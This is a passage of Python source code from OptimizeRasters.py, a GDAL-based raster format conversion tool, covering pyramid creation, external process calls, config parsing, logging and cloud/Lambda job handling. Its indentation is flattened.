updateMRF.copyInputMRFFilesToOutput()
# ends
# call any user-defined fnc for any post-processing.
if (post_processing_callback):
if (self._base.getBooleanValue(self.m_user_config.getValue(CCLOUD_UPLOAD))):
self.message(
'[{}-Push]..'.format(self.m_user_config.getValue(COUT_CLOUD_TYPE).capitalize()))
_processedPath = os.path.dirname(output_file[len(self.m_user_config.getValue(CTEMPOUTPUT, False)):])
_indx = input_file.index(_processedPath)
_input = os.path.basename(input_file) if _indx <= 0 else input_file[_indx:]
ret = post_processing_callback(post_process_output, post_processing_callback_args, input=_input,
f=post_process_output, cfg=self.m_user_config)
self.message('Status: (%s).' % ('OK' if ret else 'FAILED'))
_proxyPath = self.m_user_config.getValue(CCLONE_PATH)
if (_proxyPath and
rasterProxyPath):
mode = self.m_user_config.getValue('Mode')
if (not mode.endswith('mrf')):
isOutContainerSAS = False
cloudHandler = self._base.getSecuredCloudHandlerPrefix(
CS3STORAGE_OUT)
if (cloudHandler is None):
isOutContainerSAS = (self._base.getUserConfiguration.getValue(COUT_CLOUD_TYPE, True) == CCLOUD_AZURE and
azure_storage is not None and
azure_storage._SASToken is not None)
if (cloudHandler or
isOutContainerSAS):
outContainer = self._base.getUserConfiguration.getValue(
'Out_S3_Bucket', False)
proxyURL = self._base.getUserConfiguration.getValue(
CCFG_PRIVATE_OUTPUT, False)
proxyFileURL = rasterProxyPath.replace(_proxyPath, proxyURL)
isSecured = self._base.getBooleanValue(self._base.getUserConfiguration.getValue(UseTokenOnOuput))
_rasterSource = ''
if (isSecured):
_rasterSource = '/{}/{}/{}'.format(cloudHandler, outContainer, proxyFileURL)
else:
urlPrefix = self._base.getUserConfiguration.getValue(
COUT_VSICURL_PREFIX, False)
if (urlPrefix):
if (isOutContainerSAS):
_rasterSource = '{}{}?{}'.format(urlPrefix, proxyFileURL[len(self.m_user_config.getValue(CCFG_PRIVATE_OUTPUT, False)):], azure_storage._SASToken)
else:
_rasterSource = '{}{}'.format(urlPrefix, os.path.basename(rasterProxyPath))
if (not isOutContainerSAS):
_rasterSource = self._base.urlEncode(_rasterSource)
doc = minidom.parse(rasterProxyPath)
nodes = doc.getElementsByTagName('Source')
if (nodes):
nodes.pop().firstChild.nodeValue = _rasterSource
with open (rasterProxyPath, 'w') as writer:
writer.write(doc.childNodes[0].toxml())
# ends
if (_rpt and
_rpt.operation != COP_UPL):
if (til and
_input_file.lower().endswith(CTIL_EXTENSION_)):
originalSourcePath = til.findOriginalSourcePath(_input_file)
if (originalSourcePath is not None):
_rpt.updateRecordStatus(
originalSourcePath, CRPT_PROCESSED, CRPT_YES)
for TilRaster in til._tils_info[originalSourcePath.lower()][TIL.CKEY_FILES]:
_rpt.updateRecordStatus(self._base.convertToForwardSlash(os.path.dirname(
originalSourcePath), True) + TilRaster, CRPT_PROCESSED, CRPT_YES)
return ret
if (isRasterProxyCaller):
return ret
_rpt.updateRecordStatus(_input_file, CRPT_PROCESSED, CRPT_YES)
return ret
def createaOverview(self, input_file, isBQA=False, **kwargs):
if (CreateOverviews in kwargs):
if (not kwargs[CreateOverviews]):
# skip if called by a create raster proxy operation.
return True
pyFactor = '2'
pySampling = 'average'
mode = self.m_user_config.getValue('Mode')
if (mode):
if (mode == 'cachingmrf' or
mode == 'clonemrf' or
mode == 'rasterproxy' or
mode == 'splitmrf'):
return True
# skip pyramid creation on (tiffs) related to (til) files.
if (til):
(p, n) = os.path.split(input_file)
if (til.find(n)):
return True
# ends
# skip pyramid creation for (.ecw) files.
if (input_file.lower().endswith('.ecw')):
return True
# ends
self.message('Creating pyramid ({})'.format(input_file))
# let's input cfg values..
pyFactor_ = self.m_user_config.getValue('PyramidFactor')
if (pyFactor_ and
pyFactor_.strip()):
# can be commna sep vals in the cfg file.
pyFactor = pyFactor_.replace(',', ' ')
else:
gdalInfo = GDALInfo(self._base, self.message)
gdalInfo.init(self.m_gdal_path)
if (gdalInfo.process(input_file)):
pyFactor = gdalInfo.pyramidLevels
if (not pyFactor):
self.message('Pyramid creation skipped for file ({}). Image size too small.'.format(
input_file), const_warning_text)
return True
pySampling_ = self.m_user_config.getValue('PyramidSampling')
if (pySampling_):
pySampling = pySampling_
if (pySampling.lower() == 'avg' and
input_file.lower().endswith(CTIL_EXTENSION_)):
pySampling = 'average'
pyCompression = self.m_user_config.getValue('PyramidCompression')
args = [os.path.join(self.m_gdal_path, self.CGDAL_ADDO_EXE)]
args.append('-r')
args.append('nearest' if isBQA else pySampling)
pyQuality = self.m_user_config.getValue('Quality')
pyInterleave = self.m_user_config.getValue(CCFG_INTERLEAVE)
if (pyCompression == 'jpeg' or
pyCompression == 'png'):
if (not mode.startswith('mrf')):
pyExternal = False
pyExternal_ = self.m_user_config.getValue('Pyramids')
if (pyExternal_):
pyExternal = pyExternal_ == CCMD_PYRAMIDS_EXTERNAL
if (pyExternal):
args.append('-ro')
if (mode.startswith('tif') and
pyCompression == 'jpeg' and
pyInterleave == 'pixel'):
args.append('--config')
args.append('PHOTOMETRIC_OVERVIEW')
args.append('YCBCR')
args.append('--config')
args.append('COMPRESS_OVERVIEW')
args.append(pyCompression)
args.append('--config')
args.append('INTERLEAVE_OVERVIEW')
args.append(pyInterleave)
args.append('--config')
args.append('JPEG_QUALITY_OVERVIEW')
args.append(pyQuality)
args.append(input_file)
pyFactors = pyFactor.split()
for f in pyFactors:
args.append(f)
sourcePath = input_file
if ('source' in kwargs):
sourcePath = kwargs['source']
return self._call_external(args, name=sourcePath, method=TimeIt.Overview, store=self._base)
@TimeIt.timeOperation
def _call_external(self, args, messageCallback=None, **kwargs):
if (CRUN_IN_AWSLAMBDA):
tmpELF = '/tmp/{}'.format(os.path.basename(args[0]))
args[0] = tmpELF
p = subprocess.Popen(' '.join(args), shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
message = ''
messages = []
val = p.poll()
while (val is None):
time.sleep(0.5)
val = p.poll()
message = p.stdout.readline()
if (message):
messages.append(message.strip())
if (messages):
self.message('messages:')
for m in messages:
self.message(m)
if (not p.stderr):
return True
warnings = p.stderr.readlines()
if (warnings):
self.message('warnings/errors:')
is_error = False
for w in warnings:
w = w.strip()
if (isinstance(w, bytes)):
w = bytes.decode(w)
if (not is_error):
if (w.find('ERROR') >= 0):
is_error = True
if (w.find('ECW') >= 0 and
self._base.isLinux()): # temp fix to get rid of (no version information available) warnings for .so under linux
is_error = False
self.message(w)
if (messageCallback):
messageCallback(w)
if (is_error):
return False
return True
class BundleMaker(Compression):
CBUNDLEMAKER_BIN = 'BundleMaker'
CPROJ4SO = 'libproj.so'
CMODE = 'bundle'
CLEVEL = 'level'
def __init__(self, inputRaster, *args, **kwargs):
super(BundleMaker, self).__init__(*args, **kwargs)
self.inputRaster = inputRaster
self.bundleName = None # 'Rae80C11080'
self.level = None
def init(self):
if (not super(BundleMaker, self).init()):
return False
self.homePath = os.path.join(os.path.dirname(
os.path.abspath(__file__)), 'BundleMaker')
if (CRUN_IN_AWSLAMBDA):
_tmp = '/tmp/{}'.format(self.CBUNDLEMAKER_BIN)
if (not self._base.copyBinaryToTmp(os.path.join(self.homePath, self.CBUNDLEMAKER_BIN), _tmp)):
return False
if (not self._lambdaCopySharedSO(self.CPROJ4SO)):
return False
self.homePath = _tmp
return True
def _messageCallback(self, msg):
if (self.level is None and
msg.startswith('Output at level')):
self.level = msg[msg.rfind(' ') + 1:]
def run(self):
_resumeReporter = self._base.getUserConfiguration.getValue(
CPRT_HANDLER)
if (not _resumeReporter or
(_resumeReporter and
(Report.CHDR_TEMPOUTPUT not in _resumeReporter._header or
self.CMODE not in _resumeReporter._header or
self.CLEVEL not in _resumeReporter._header))):
return False
self.bundleName = _resumeReporter._header[self.CMODE]
self.level = _resumeReporter._header[self.CLEVEL]
args = [self.homePath if CRUN_IN_AWSLAMBDA else os.path.join(self.homePath, '{}.exe'.format(self.CBUNDLEMAKER_BIN)),
'-level', self.level, '-bundle', self.bundleName, self.inputRaster, _resumeReporter._header[Report.CHDR_TEMPOUTPUT]]
self.message('BundleMaker> ({})'.format(self.inputRaster))
ret = self._call_external(args)
if (not ret or
not self.level):
return ret
if (self._base.getBooleanValue(_resumeReporter._header[Report.CHDR_CLOUDUPLOAD])):
self._base.S3Upl(os.path.join(
_resumeReporter._header[Report.CHDR_TEMPOUTPUT], '_alllayers/L{}/{}.mrf'.format(self.level, self.bundleName)), None)
return True
class Config:
def __init__(self):
pass
def init(self, config, root):
try:
self.m_doc = minidom.parse(config)
except BaseException:
return False
nodes = self.m_doc.getElementsByTagName(root)
if (len(nodes) == 0):
return False
node = nodes[0].firstChild
self.m_cfgs = {}
while (node):
if (not node.hasChildNodes()):
node = node.nextSibling
continue
if (not (node.nodeName in self.m_cfgs)):
self.m_cfgs[node.nodeName] = node.firstChild.nodeValue
node = node.nextSibling
pass
return True
def getValue(self, key, toLower=True): # returns (value) or None
if (key in self.m_cfgs):
if (toLower):
try: # trap any non-strings
return self.m_cfgs[key].lower()
except BaseException:
pass
return self.m_cfgs[key]
return None
def setValue(self, key, value):
if (key in self.m_cfgs):
if (hasattr(self.m_cfgs[key], '__setitem__')):
self.m_cfgs[key].append(value)
return
self.m_cfgs[key] = value
def getInputOutput(inputfldr, outputfldr, file, isinput_s3):
input_file = os.path.join(inputfldr, file)
output_file = os.path.join(outputfldr, file)
ifile_toLower = input_file.lower()
if (ifile_toLower.startswith('http://') or
ifile_toLower.startswith('https://')):
cfg.setValue(CIN_S3_PREFIX, '/vsicurl/')
input_file = input_file.replace('\\', '/')
isinput_s3 = True
if (isinput_s3):
azSAS = cfg.getValue(CFGAZSAS, False)
input_file = '{}{}{}'.format(cfg.getValue(
CIN_S3_PREFIX, False), input_file, '?' + azSAS if azSAS else '')
output_file = outputfldr
if (getBooleanValue(cfg.getValue(CISTEMPINPUT)) or
getBooleanValue(cfg.getValue(CISTEMPOUTPUT))):
output_file = os.path.join(output_file, file)
if (getBooleanValue(cfg.getValue(CISTEMPINPUT))):
input_file = os.path.join(
cfg.getValue(CTEMPINPUT, False), file)
if (getBooleanValue(cfg.getValue(CISTEMPOUTPUT))):
tempOutput = cfg.getValue(CTEMPOUTPUT, False)
_file = file
# http source raster entries without -tempinput will have subfolder info in (output_file)
if (output_file.startswith(tempOutput)):
_file = output_file.replace(tempOutput, '')
output_file = os.path.join(
cfg.getValue(CTEMPOUTPUT, False), _file)
return (input_file, output_file)
output_file = os.path.join(output_file, file)
return (input_file, output_file)
def formatExtensions(value):
if (value is None or
len(value.strip()) == 0):
return []
frmts = value.split(',')
for i in range(0, len(frmts)):
frmts[i] = frmts[i].strip()
return frmts
# custom exit code block to write out logs
def terminate(objBase, exit_code, log_category=False):
if (objBase):
success = 'OK'
if (exit_code != 0):
success = 'Failed!'
objBase.message('[{}]'.format(success), objBase.const_status_text)
if (log_category):
log.CloseCategory()
objBase.close() # persist information/errors collected.
return (exit_code)
# ends
# collect input files to support (resume) support.
def fn_collect_input_files(src):
if (not src):
return False
if (not g_is_generate_report or
not g_rpt):
return False
try:
_type = 'local'
_src = str(src) # input (src) could be an object
if (_src.startswith('<Key')):
_type = 'cloud'
_brk = _src.split(',')
_src = _brk[1].replace('>', '')
g_rpt.addFile(_src)
return True
except BaseException:
pass
return False
def fn_pre_process_copy_default(src, dst, arg):
if (fn_collect_input_files(src)):
# just gathering information for the report either (op=report). Do not proceed with (Copying/e.t.c)
return False
if (not src):
return False
if (til):
if (src.lower().endswith(CTIL_EXTENSION_)):
til.setOutputPath(src, dst)
return True
def fn_copy_temp_dst(input_source, cb_args, **kwargs):
fn_cpy_ = Copy()
file_lst = fn_cpy_.get_group_filelist(input_source)
if (len(file_lst) == 0):
return False # no copying.
files = []
for file in file_lst:
(p, f) = os.path.split(file.replace('\\', '/'))
if (kwargs is not None):
if (isinstance(kwargs, dict)):
if (('cfg' in kwargs)):
if (not getBooleanValue(kwargs['cfg'].getValue(CISTEMPOUTPUT))):
return False # no copying..
p += '/'
t = kwargs['cfg'].getValue(CTEMPOUTPUT, False).replace(
'\\', '/') # safety check
# making sure, replace will work fine.
if (not t.endswith('/')):
t += '/'
o = kwargs['cfg'].getValue(CCFG_PRIVATE_OUTPUT, False).replace(
'\\', '/') # safety check
if (not o.endswith('/')):
o += '/'
dst = (p.replace(t, o))
files.append({'src': p, 'dst': dst, 'f': f})
if (len(files) != 0):
fn_cpy_.batch(files, {'mode': 'move'}, None)
return True
class Args:
def __init__(self):
pass
def __setattr__(self, name, value):
self.__dict__[name] = value
def __getattr__(self, name):
try:
return self.__dict__[name]
except KeyError:
return None
def __str__(self):
_return_str = ''
for k in self.__dict__:
_return_str += '{}={},'.format(k, self.__getattr__(k))
if (_return_str[-1:] == ','):
_return_str = _return_str[:len(_return_str) - 1]
return _return_str
def makedirs(filepath):
try:
os.makedirs(filepath)
except Exception as e:
if (os.path.exists(filepath)): # filepath already exists
return
raise
class Application(object):
__program_ver__ = 'v2.0.6f'
__program_date__ = '20211010'
__program_name__ = 'OptimizeRasters.py {}/{}'.format(
__program_ver__, __program_date__)
__program_desc__ = 'Convert raster formats to a valid output format through GDAL_Translate.\n' + \
'\nPlease Note:\nOptimizeRasters.py is entirely case-sensitive, extensions/paths in the config ' + \
'file are case-sensitive and the program will fail if the correct path/case is not ' + \
'entered at the cmd-line or in the config file.\n'
def __init__(self, args):
self._usr_args = args
self._msg_callback = None
self._log_path = None
self._base = None
self._postMessagesToArcGIS = False
def __load_config__(self, config):
global cfg
if (self._args is None):
return False
# read in the config file.
if (not self._args.config):
self._args.config = os.path.abspath(
os.path.join(os.path.dirname(__file__), CCFG_FILE))
config_ = self._args.config
if (self._args.input and # Pick up the config file name from a (resume) job file.
self._args.input.lower().endswith(Report.CJOB_EXT)):
_r = Report(Base())
if (not _r.init(self._args.input)):
self.writeToConsole('Err. ({})/init'.format(self._args.input))
return False
# Big .orjob files can take some time.
self.writeToConsole('ORJob> Reading/Preparing data. Please wait..')
if (not _r.read()):
self.writeToConsole('Err. ({})/read'.format(self._args.input))
return False
self.writeToConsole('ORJob> Done.') # msg end of read.
if (CRPT_HEADER_KEY in _r._header):
config_ = _r._header[CRPT_HEADER_KEY]
if (Report.CHDR_MODE in _r._header):
# mode in .orjob has priority over the template <Mode> value.
self._args.mode = _r._header[Report.CHDR_MODE]
if (Report.CHDR_OP in _r._header):
self._args.op = _r._header[Report.CHDR_OP]
_r = None
# replace/force the original path to abspath.
self._args.config = os.path.abspath(config_).replace('\\', '/')
cfg = Config()
ret = cfg.init(config_, 'Defaults')
if (not ret):
msg = 'Err. Unable to read-in settings from ({})'.format(config_)
# log file is not up yet, write to (console)
self.writeToConsole(msg, const_critical_text)
return False
# ends
# deal with cfg extensions (rasters/exclude list)
opCopyOnly = False
operation = cfg.getValue(COP)
if (not operation):
operation = self._args.op
if (operation):
# no defaults for (CCFG_RASTERS_NODE, CCFG_EXCLUDE_NODE) if op={COP_COPYONLY}
opCopyOnly = operation == COP_COPYONLY
rasters_ext_ = cfg.getValue(CCFG_RASTERS_NODE, False)
if (rasters_ext_ is None and
not opCopyOnly):
# defaults: in-code if defaults are missing in cfg file.
rasters_ext_ = 'tif,mrf'
exclude_ext_ = cfg.getValue(CCFG_EXCLUDE_NODE, False)
if (exclude_ext_ is None and
not opCopyOnly):
# defaults: in-code if defaults are missing in cfg file.
exclude_ext_ = 'ovr,rrd,aux.xml,idx,lrc,mrf_cache,pjp,ppng,pft,pzp,pjg'
cfg.setValue(CCFG_RASTERS_NODE, [] if opCopyOnly else formatExtensions(
rasters_ext_)) # {CCFG_RASTERS_NODE} entries not allowed for op={COP_COPYONLY}
cfg.setValue(CCFG_EXCLUDE_NODE, formatExtensions(exclude_ext_))
cfg.setValue('cmdline', self._args)
# ends
# init -mode
# cfg-init-valid modes
cfg_modes = {
'tif',
'tif_lzw',
'tif_jpeg',
'tif_cog',
'tif_mix',
'tif_dg',
'tiff_landsat',
'mrf',
'mrf_jpeg',
'mrf_mix',
'mrf_dg',
'mrf_landsat',
'cachingmrf',
'clonemrf',
'rasterproxy',
'splitmrf',
BundleMaker.CMODE,
'aid'
}
# ends
# read-in (-mode)
# cmd-line -mode overrides the cfg value.
cfg_mode = self._args.mode
if (cfg_mode is None):
cfg_mode = cfg.getValue('Mode')
if (cfg_mode is None or
(not cfg_mode.lower() in cfg_modes)):
Message('<Mode> value not set/illegal ({})'.format(str(cfg_mode)),
Base.const_critical_text)
return False
cfg_mode = cfg_mode.lower()
cfg.setValue('Mode', cfg_mode)
# ends
return True
def __setupVersionCheck(self):
self._base._m_log.CreateCategory('VersionCheck')
try:
from ProgramCheckAndUpdate import ProgramCheckAndUpdate
except ImportError as e:
msg = 'ProgramCheckAndUpdate module is not found, unable to check version updates.'
self._base.message(msg, self._base.const_warning_text)
self._base._m_log.CloseCategory()
return False
versionCheck = ProgramCheckAndUpdate()
self._base.message('Checking for updates..')
verMessage = versionCheck.run(
os.path.dirname(os.path.realpath(__file__)))
if(verMessage is not None):
self._base.message(verMessage)
self._base._m_log.CloseCategory()
return True
def __setupLogSupport(self):
log = None
try:
solutionLib_path = os.path.realpath(__file__)
if (not os.path.isdir(solutionLib_path)):
solutionLib_path = os.path.dirname(solutionLib_path)
_CLOG_FOLDER = 'logs'
self._log_path = os.path.join(solutionLib_path, _CLOG_FOLDER)
sys.path.append(os.path.join(solutionLib_path, 'SolutionsLog'))
import logger
log = logger.Logger()
log.Project('OptimizeRasters')
log.LogNamePrefix('OR')
log.StartLog()
cfg_log_path = cfg.getValue(CFGLogPath)
if (self._args.job):
cfg_log_path = self._args.job
if (not cfg_log_path):
LogPath = 'logPath'
if (LogPath in self._usr_args):
cfg_log_path = self._usr_args[LogPath]
if (cfg_log_path):
if (cfg_log_path.lower().endswith(Report.CJOB_EXT)):
(cfg_log_path, f) = os.path.split(cfg_log_path)
if (not os.path.isdir(cfg_log_path)):
try:
os.makedirs(cfg_log_path)
except Exception as e:
Message('Invalid log-path (%s). Resetting to (%s)' %
(cfg_log_path, self._log_path))
cfg_log_path = None
if (cfg_log_path):
self._log_path = os.path.join(cfg_log_path, _CLOG_FOLDER)
log.SetLogFolder(self._log_path)
print('Log-path set to ({})'.format(self._log_path))
except Exception as e:
print('Warning: External logging support disabled! ({})'.format(str(e)))
# let's write to log (input config file content plus all cmd-line args)
if (log):
log.Message('version={}/{}'.format(Application.__program_ver__,
Application.__program_date__), const_general_text)
# inject cmd-line
log.CreateCategory('Cmd-line')
cmd_line = []
_args_text = str(self._args).replace(
'Namespace(', '').replace('\\\\', '/')
_args_text_len = len(_args_text)
_args = _args_text[:_args_text_len - 1 if _args_text[-1:]
== ')' else _args_text_len].split(',')
for arg in _args:
try:
(k, v) = arg.split('=')
except BaseException:
log.Message('Invalid arg at cmd-line (%s)' %
(arg.strip()), const_critical_text)
continue
if (v != 'None'):
cmd_line.append(
'-{}'.format(arg.replace('\'', '"').strip()))
log.Message(' '.join(cmd_line), const_general_text)
log.CloseCategory()
# ends
# inject cfg content
log.CreateCategory('Input-config-values')
for v in cfg.m_cfgs:
if (v == 'cmdline'):
continue
log.Message('%s=%s' % (v, cfg.m_cfgs[v]), const_general_text)
log.CloseCategory()
# ends
return Base(log, self._msg_callback, cfg)
def writeToConsole(self, msg, status=const_general_text):
if (self._msg_callback):
return (self._msg_callback(msg, status))
print(msg) # log file is not up yet, write to (console)
return True
@property
def configuration(self):
if (self._base is None):
return None
return self._base.getUserConfiguration.m_cfgs
@configuration.setter
def configuration(self, value):
self._base.getUserConfiguration.m_cfgs = value
if (_rpt):
if (COP_RPT in value):
_rpt._header = value[COP_RPT]._header
_rpt.write()
def getReport(self):
global _rpt
if (_rpt):
return _rpt
storeOp = self._args.op
self._args.op = COP_CREATEJOB
result = self.run()
if (not result):
self._args.op = storeOp
return None
newOrJobFile = os.path.join(os.path.dirname(
__file__), cfg.getValue(CPRJ_NAME, False)) + Report.CJOB_EXT
# skip reinitialiaztion, change the input to point the newly created .orjob file.
self._args.input = newOrJobFile
self._args.op = storeOp
return _rpt if _rpt else None
def init(self):
global _rpt, \
cfg, \
til
self.writeToConsole(self.__program_name__)
self.writeToConsole(self.__program_desc__)
_rpt = cfg = til = None
if (not self._usr_args):
return False
os.path.sep = '/'
if (isinstance(self._usr_args, argparse.Namespace)):
self._args = self._usr_args
else:
self._args = Args()
for i in self._usr_args:
try:
self._args.__setattr__(i, self._usr_args[i])
except BaseException:
pass
if (self._args.__getattr__(CRESUME_ARG) is None):
self._args.__setattr__(CRESUME_ARG, True)
if (not self.__load_config__(self._args)):
return False
self._base = self.__setupLogSupport() # initialize log support.
if (self._base.getMessageHandler):
self._base._m_log.isGPRun = self.postMessagesToArcGIS
if (not CDisableVersionCheck):
self.__setupVersionCheck()
if (not self._base.init()):
self._base.message(
'Unable to initialize the (Base) module', self._base.const_critical_text)
return False
if (self._args.input and
self._args.input.lower().endswith(Report.CJOB_EXT) and
os.path.isfile(self._args.input)):
_rpt = Report(self._base)
# not checked for return.
if (not _rpt.init(self._args.input)):
self._base.message('Unable to init (Report/job)',
self._base.const_critical_text)
return False
for arg in vars(self._args):
if (arg == CRESUME_HDR_INPUT):
continue
# any other cmd-line args will be ignored/nullified.
setattr(self._args, arg, None)
if (not _rpt.read(self.__jobContentCallback)):
self._base.message(
'Unable to read the -input job file.', self._base.const_critical_text)
return False
if (CRESUME_HDR_OUTPUT in self._usr_args):
# override the output path in the .orjob file if a custom 'output' path exists.
# do only if called by user code. self._usr_args type is 'argparse' when called by cmd-line
if (isinstance(self._usr_args, dict)):
userOutput = self._base.convertToForwardSlash(
self._usr_args[CRESUME_HDR_OUTPUT])
self._base.getUserConfiguration.setValue(
CCFG_PRIVATE_OUTPUT, userOutput)
self._args.output = userOutput
# ends
self._base.getUserConfiguration.setValue(CPRT_HANDLER, _rpt)
# verify user defined text for cloud output path
usrPath = self._args.hashkey
if (usrPath):
usrPathPos = CHASH_DEF_INSERT_POS # default insert pos
_s = usrPath.split(CHASH_DEF_SPLIT_CHAR)
if (len(_s) == 2):
if (not _s[0]):
_s[0] = CHASH_DEF_CHAR
usrPath = _s[0]
if (len(_s) > 1):
try:
usrPathPos = int(_s[1])
if (int(_s[1]) < CHASH_DEF_INSERT_POS):
usrPathPos = CHASH_DEF_INSERT_POS
except BaseException:
pass
self._base.getUserConfiguration.setValue(
CUSR_TEXT_IN_PATH, '{}{}{}'.format(usrPath, CHASH_DEF_SPLIT_CHAR, usrPathPos))
# ends
# do we need to process (til) files?
if ('til' in [x.lower() for x in self._base.getUserConfiguration.getValue(CCFG_RASTERS_NODE)]):
til = TIL()
if (self._base.getBooleanValue(self._base.getUserConfiguration.getValue(CDEFAULT_TIL_PROCESSING))):
til.defaultTILProcessing = True
# ends
return True
def registerMessageCallback(self, fnptr):
if (not fnptr):
return False
self._msg_callback = fnptr
@property
def postMessagesToArcGIS(self):
return self._postMessagesToArcGIS
@postMessagesToArcGIS.setter
def postMessagesToArcGIS(self, value):
self._postMessagesToArcGIS = getBooleanValue(value)
def __jobContentCallback(self, line):
if (cfg):
if (cfg.getValue(CLOAD_RESTORE_POINT)): # ignore if not called from main()
return True
lns = line.strip().split(',')
_fname = lns[0].strip().replace('\\', '/')
if (_fname.startswith(Report.CHEADER_PREFIX)):
_hdr = _fname.replace(Report.CHEADER_PREFIX, '').split('=')
if (len(_hdr) > 1):
_key = _hdr[0].strip()
_hdr.pop(0)
_val = '='.join(_hdr).strip()
if (_key == CRESUME_HDR_INPUT):
return True
setattr(self._args, _key, _val)
return True
def __initOperationCreateJob(self):
global _rpt
_rpt = Report(self._base)
createdOrjob = cfg.getValue(CPRJ_NAME, False)
if (not createdOrjob.lower().endswith(Report.CJOB_EXT)):
createdOrjob += Report.CJOB_EXT
if (not _rpt.init(os.path.join(os.path.dirname(os.path.abspath(__file__)), createdOrjob)) or
not _rpt.read()): # not checked for return.
self._base.message(
'Unable to init/read (Report/job/op/createJob)', self._base.const_critical_text)
return False
return True
@property
def isOperationCreateJob(self):
if (self._args.op and
self._args.op == COP_CREATEJOB): # note (op=={COP_CREATEJOB} is ignored if resume == {CRESUME_ARG_VAL_RETRYALL}
if (_rpt):
if (CRESUME_ARG in _rpt._header and
_rpt._header[CRESUME_ARG].lower() == CRESUME_ARG_VAL_RETRYALL):
return False
return True
return False
def _isLambdaJob(self):
if (CRUN_IN_AWSLAMBDA):
return False
if (self._args.op and
self._args.op.startswith(COP_LAMBDA)):
if (not self._base.getBooleanValue(self._args.clouddownload)):
_resumeReporter = self._base.getUserConfiguration.getValue(
CPRT_HANDLER)
if (_resumeReporter and
not _resumeReporter._isInputHTTP):
return False
if (self._base.getBooleanValue(self._args.cloudupload)):
return True
return False
def _runLambdaJob(self, jobFile):
# process @ lambda
self._base.message('Using AWS Lambda..')
sns = Lambda(self._base)
if (not sns.initSNS('aws_lambda')):
self._base.message('Unable to initialize',
self._base.const_critical_text)
return False
if (not sns.submitJob(jobFile)):
self._base.message('Unable to submit job.',
self._base.const_critical_text)
return False
return True
# ends
def run(self):
global raster_buff, \
til, \
cfg, \
_rpt, \
g_rpt, \
g_is_generate_report, \
user_args_Callback, \
S3_storage, \
azure_storage, \
google_storage
S3_storage = None
azure_storage = None
google_storage = None
g_rpt = None
raster_buff = []
g_is_generate_report = False
CRESUME_CREATE_JOB_TEXT = '[Resume] Creating job ({})'
# is resume?
if (self._args.input and
self._args.input.lower().endswith(Report.CJOB_EXT) and
os.path.isfile(self._args.input)):
_rpt = Report(self._base)
# not checked for return.
if (not _rpt.init(self._args.input)):
self._base.message(
'Unable to init (Reporter/obj)', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
if (not _rpt.read()):
self._base.message('Unable to read the -input report file ({})'.format(
self._args.input), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
self._args.job = os.path.basename(self._args.input)
self._base.getUserConfiguration.setValue(CPRT_HANDLER, _rpt)
# ends
# Get the default (project name)
p = f = None
project_name = self._args.job
if (project_name):
(p, f) = os.path.split(project_name)
if (os.path.isdir(project_name)):
project_name = None
if (f):
project_name = f
if (not p):
p = __file__
if (project_name and
project_name.lower().endswith(Report.CJOB_EXT)):
project_name = project_name[:len(
project_name) - len(Report.CJOB_EXT)]
if (not project_name and
not f):
project_name = cfg.getValue(CPRJ_NAME, False)
if (not project_name and
not f): # is the project still null?
project_name = Report.getUniqueFileName() # 'OptimizeRasters'
if (self._base.getMessageHandler):
# update (log) file name prefix.
self._base.getMessageHandler.LogNamePrefix(project_name)
cfg.setValue(CPRJ_NAME, project_name)
_project_path = '{}{}'.format(os.path.join(os.path.dirname(self._args.input if self._args.input and self._args.input.lower(
).endswith(Report.CJOB_EXT) else p), project_name), Report.CJOB_EXT)
if (not cfg.getValue(CLOAD_RESTORE_POINT)):
if (os.path.exists(_project_path)):
# .orobs with -op={createJob} can't be run.
if (self.isOperationCreateJob):
self._base.message('{} Job ({}) already exists!'.format(
CRESUME_MSG_PREFIX, _project_path))
return True
# process @ lambda?
if (self._isLambdaJob()):
return(terminate(self._base, eOK if self._runLambdaJob(_project_path) else eFAIL))
# ends
self._args.op = None
self._args.input = _project_path
cfg.setValue(CLOAD_RESTORE_POINT, True)
self._base.message('{} Using job ({})'.format(
CRESUME_MSG_PREFIX, _project_path))
_status = self.run()
return
# ends
# set cloudupload value {
if (self._args.cloudupload is None):
self._args.cloudupload = cfg.getValue(CCLOUD_UPLOAD)
# }
# detect input cloud type
cloudDownloadType = self._args.clouddownloadtype
if (not cloudDownloadType):
cloudDownloadType = cfg.getValue(CIN_CLOUD_TYPE, True)
inAmazon = cloudDownloadType == CCLOUD_AMAZON or not cloudDownloadType
if (inAmazon):
cloudDownloadType = Store.TypeAmazon
cfg.setValue(CIN_CLOUD_TYPE, cloudDownloadType)
# ends
# are we doing input from S3|Azure?
isinput_s3 = self._base.getBooleanValue(self._args.s3input)
if (self._args.clouddownload):
isinput_s3 = self._base.getBooleanValue(self._args.clouddownload)
# ends
# let's create a restore point
if (not self._args.input or # assume it's a folder from s3/azure
(self._args.input and
not os.path.isfile(self._args.input))):
if (not self._args.op):
self._args.op = COP_RPT
# valid (op/utility) commands
_utility = {
COP_UPL: None,
COP_DNL: None,
COP_RPT: None,
COP_NOCONVERT: None,
COP_LAMBDA: None,
COP_COPYONLY: None,
COP_CREATEJOB: None
}
# ends
# op={COP_COPYONLY} check
if (self._args.op == COP_RPT):
opKey = cfg.getValue(COP)
if (opKey == COP_COPYONLY):
if (self._base.getBooleanValue(self._args.cloudupload) or
self._args.s3output):
# conditions will enable local->local copy if -cloudupload is (false)
self._args.op = COP_UPL
else:
# -tempoutput is disabled if -cloudupload=false and -op={COP_COPYONLY}
self._args.tempoutput = None
if (isinput_s3):
self._args.op = COP_NOCONVERT
# Delete temporary files in (local) transit for (op={COP_COPYONLY}) if the input source is from (cloud).
cfg.setValue(COUT_DELETE_AFTER_UPLOAD, True)
# However, If the input (source) path is from the local machine, the config value in (COUT_DELETE_AFTER_UPLOAD) is used.
# ends
if (self._args.op):
splt = self._args.op.split(':')
splt[0] = splt[0].lower()
self._args.op = ':'.join(splt)
# -op arg can have multiple init values separated by ':', e.g. -op lambda:function:xyz
if (splt[0] not in _utility):
self._base.message('Invalid utility operation mode ({})'.format(
self._args.op), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
if(self._args.op == COP_RPT or
self._args.op == COP_UPL or
self._args.op == COP_NOCONVERT or
self._args.op == COP_COPYONLY or
self._args.op == COP_CREATEJOB or
self._args.op.startswith(COP_LAMBDA)):
if (self._args.op.startswith(COP_LAMBDA)):
# make these cmd-line args (optional) to type at the cmd-line for op={COP_LAMBDA}
isinput_s3 = self._args.clouddownload = self._args.cloudupload = True
cfg.setValue(Lambda.queue_length, self._args.queuelength)
